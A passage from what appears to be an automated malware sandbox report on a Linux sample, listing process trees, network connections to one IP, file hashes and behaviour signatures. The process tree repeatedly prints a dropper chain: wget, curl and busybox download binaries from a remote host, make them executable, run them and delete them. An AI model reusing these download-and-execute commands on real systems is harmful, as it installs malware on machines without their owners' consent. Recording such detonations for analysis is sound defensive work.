[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 tcp

Files

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-20 04:21

Reported

2024-11-20 04:23

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

37s

Max time network

39s

Command Line

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu N/A
N/A /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr N/A
N/A /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY N/A
N/A /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A
N/A /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B N/A
N/A /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp N/A
N/A /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 N/A
N/A /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 N/A
N/A /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 N/A
N/A /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 N/A
N/A /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p N/A
N/A /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP N/A
N/A /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI N/A
N/A /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 N/A
N/A /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B N/A
N/A /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp N/A
N/A /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu N/A
N/A /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr N/A
N/A /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY N/A
N/A /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /usr/bin/curl N/A
File opened for modification /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP /usr/bin/curl N/A
File opened for modification /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /usr/bin/curl N/A
File opened for modification /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /usr/bin/curl N/A
File opened for modification /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /usr/bin/curl N/A
File opened for modification /tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp /usr/bin/curl N/A
File opened for modification /tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2 /usr/bin/curl N/A
File opened for modification /tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu /usr/bin/curl N/A
File opened for modification /tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4 /usr/bin/curl N/A
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /usr/bin/curl N/A
File opened for modification /tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY /usr/bin/curl N/A
File opened for modification /tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4 /usr/bin/curl N/A
File opened for modification /tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY /usr/bin/curl N/A
File opened for modification /tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p /usr/bin/curl N/A
File opened for modification /tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0 /usr/bin/curl N/A
File opened for modification /tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI /usr/bin/curl N/A
File opened for modification /tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2 /usr/bin/curl N/A
File opened for modification /tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr /usr/bin/curl N/A

Processes

/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN

[/tmp/f064d9b048e7a9ebfafd42ad6312891eb24fe7887284fafac08ecb4d8547ec6aN]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/chmod

[chmod 777 rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/tmp/rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu

[./rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/bin/rm

[rm rVJ9W48EiBkY2qKPChyniNtNM7aSW0i2Zu]

/usr/bin/wget

[wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/chmod

[chmod 777 qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/tmp/qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr

[./qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/bin/rm

[rm qyCnZJ5Sqk6oxhJgUJH1ssQuiWAYm4vYnr]

/usr/bin/wget

[wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/chmod

[chmod 777 jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/tmp/jMz018FmqirIthXno2QOE7F6cNd83CvXXY

[./jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/bin/rm

[rm jMz018FmqirIthXno2QOE7F6cNd83CvXXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/chmod

[chmod 777 iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/tmp/iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY

[./iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/bin/rm

[rm iv4c8JysYuHJvbhRma1GzoMM3YnCOG2tXY]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/chmod

[chmod 777 DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/tmp/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI

[./DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/rm

[rm DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/wget

[wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/chmod

[chmod 777 BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/tmp/BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2

[./BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/bin/rm

[rm BCDmLdkmM5D1bhEzTVoUiYVjKNEQzoRMx2]

/usr/bin/wget

[wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/chmod

[chmod 777 s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/tmp/s45lvV1K474ofmcNwNK414hXZBMOCYnE5B

[./s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/bin/rm

[rm s45lvV1K474ofmcNwNK414hXZBMOCYnE5B]

/usr/bin/wget

[wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/chmod

[chmod 777 f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/tmp/f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp

[./f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/bin/rm

[rm f47uxlAMen7dzA4K47gsoTEIUktHUtjbtp]

/usr/bin/wget

[wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/chmod

[chmod 777 cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/tmp/cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4

[./cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/bin/rm

[rm cEGEIHGdxnY0x08euKC0u5fr1kKINFRcr4]

/usr/bin/wget

[wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/chmod

[chmod 777 IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/tmp/IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4

[./IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/bin/rm

[rm IoK8hUPVrGlFR0Kb6yLTbZrgKBkpEvqrk4]

/usr/bin/wget

[wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/chmod

[chmod 777 Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/tmp/Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0

[./Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/bin/rm

[rm Es6MiN5WzwpSTugRMvTgayPgDFbBpZYYb0]

/usr/bin/wget

[wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/chmod

[chmod 777 Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/tmp/Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2

[./Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/bin/rm

[rm Y5YOy13iVAQXMyJ1t6fzIDoXuyGBPtVGg2]

/usr/bin/wget

[wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/chmod

[chmod 777 ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/tmp/ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p

[./ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/bin/rm

[rm ew5XxM5yfsIMC4YvaJo6sPimptMp3yfV4p]

/usr/bin/wget

[wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/chmod

[chmod 777 FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/tmp/FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP

[./FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/bin/rm

[rm FfOTFgueVMJAtK7pHeQKMDxnmcPBMbd7eP]

/usr/bin/wget

[wget http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DmPLb6Tc3QZMkd2SyhaVS0wzI0ecuwwAfI]

/bin/busybox

